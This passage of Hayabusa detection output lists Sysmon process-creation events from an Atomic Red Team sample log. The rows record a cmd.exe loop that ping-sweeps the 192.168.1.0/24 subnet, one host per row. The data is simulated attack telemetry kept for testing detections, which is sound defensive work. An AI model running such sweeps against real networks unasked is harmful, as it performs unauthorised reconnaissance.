+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.047 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.507 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.031 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.515 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping 